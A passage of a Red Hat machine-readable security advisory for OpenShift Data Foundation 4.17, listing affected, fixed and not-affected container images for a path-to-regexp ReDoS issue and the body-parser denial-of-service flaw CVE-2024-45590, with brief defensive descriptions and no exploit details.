"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "path-to-regexp: Backtracking regular expressions cause ReDoS"
},
{
"cve": "CVE-2024-45590",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2024-09-10T16:20:29.292154+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311171"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "body-parser: Denial of Service Vulnerability in body-parser",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
